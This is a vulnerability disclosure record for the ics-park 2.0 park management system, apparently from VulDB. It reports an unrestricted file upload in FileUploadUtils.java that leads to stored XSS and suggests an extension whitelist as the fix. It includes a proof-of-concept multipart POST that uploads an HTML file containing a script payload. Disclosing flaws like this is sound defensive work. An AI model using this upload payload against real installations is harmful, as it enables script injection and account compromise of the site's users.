| 标题 | fcba_zzm ics-park 2.0 Unrestricted Upload |
|---|
| 描述 | ICS-Park Improper File Upload Extension Validation Leading to Stored Cross-Site Scripting (XSS)
# NAME OF AFFECTED PRODUCT(S)
* ics-park
## Vendor Homepage
https://gitee.com/fcba_zzm/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
* yyjccc
## Vulnerable File
* FileUploadUtils.java
## VERSION(S)
* V2.0
## Software Link
* [https://gitee.com/fcba_zzm/ics-park](https://gitee.com/fcba_zzm/ics-park)
# PROBLEM TYPE
## Vulnerability Type
* improper file upload → stored XSS
## Root Cause
The vulnerability originates from improper validation of uploaded file types in the ICS-Park file upload module. The system only performs weak or incomplete checks on file extensions, allowing files with dangerous types (e.g., .html, .xml) to be uploaded. Because these files are stored in a web-accessible location and served without proper content-type enforcement or sanitization, they can be interpreted as executable code in the browser.
## Impact
* Attackers can manipulate authenticated users into performing actions like changing passwords or modifying account settings, all without the user’s consent.
Successful exploitation can lead to:
* Unauthorized account access or data manipulation.
* Privilege escalation or unauthorized actions performed on behalf of the user.
* Potential data loss or unauthorized data leakage.
# DESCRIPTION
* ICS-Park suffers from improper file upload validation, where the system does not strictly restrict dangerous file extensions. An attacker can upload malicious files such as `.html` or `.xml`. When accessed, these files are rendered directly in the victim’s browser, allowing arbitrary JavaScript execution.
This issue enables a **Stored Cross-Site Scripting (XSS) vulnerability**, which could be exploited by an authenticated attacker.
# Vulnerability details and POC
## Vulnerability lonameion:
* **`FileUploadUtils.java`**
## Payload:
Log in to the system and upload the file using the following payload
```notranslate
POST /api/dfs/upload HTTP/1.1
Host: localhost:9227
sec-ch-ua: "Not;A=Brand";v="99", "Google Chrome";v="139", "Chromium";v="139"
Origin: http://localhost:8000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJdOygUAQDhzw1zAy
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: same-origin
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate, br, zstd
Accept: application/json, text/plain, */*
token: d6e3601d372b42ffb2eaad21aa6b3598
sign: 96782c8471657d1505b795009245cef0
Sec-Fetch-Dest: empty
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Sec-Fetch-Mode: cors
Referer: http://localhost:8000/account/settings/base
Content-Length: 16305
------WebKitFormBoundaryJdOygUAQDhzw1zAy
Content-Disposition: form-data; name="file"; filename="xx.html"
Content-Type: image/jpeg
hi,test!<script>alert('xss')</script>
------WebKitFormBoundaryJdOygUAQDhzw1zAy--
```
## The following are screenshots of some specific information obtained from testing and running:
<img width="1555" height="575" alt="Image" src="https://github.com/user-attachments/assets/88cb862c-a6fd-4130-9488-a20c7985d9a0" />
<img width="1707" height="807" alt="Image" src="https://github.com/user-attachments/assets/12a7c689-0a8e-4ae7-9204-ea893fcce1a8" />
# Suggested repair
1. **Strict File Extension Whitelisting**
Only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .xml, .html). |
|---|
| 来源 | ⚠️ https://github.com/Yyjccc/CVE/issues/2 |
|---|
| 用户 | Yyjccc (UID 89726) |
|---|
| 提交 | 2025-09-02 18時26分 (8 月前) |
|---|
| 管理 | 2025-09-13 21時23分 (11 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 323833 [fcba_zzm ics-park Smart Park Management System 2.0 FileUploadUtils.java 文件 权限提升] |
|---|
| 积分 | 20 |
|---|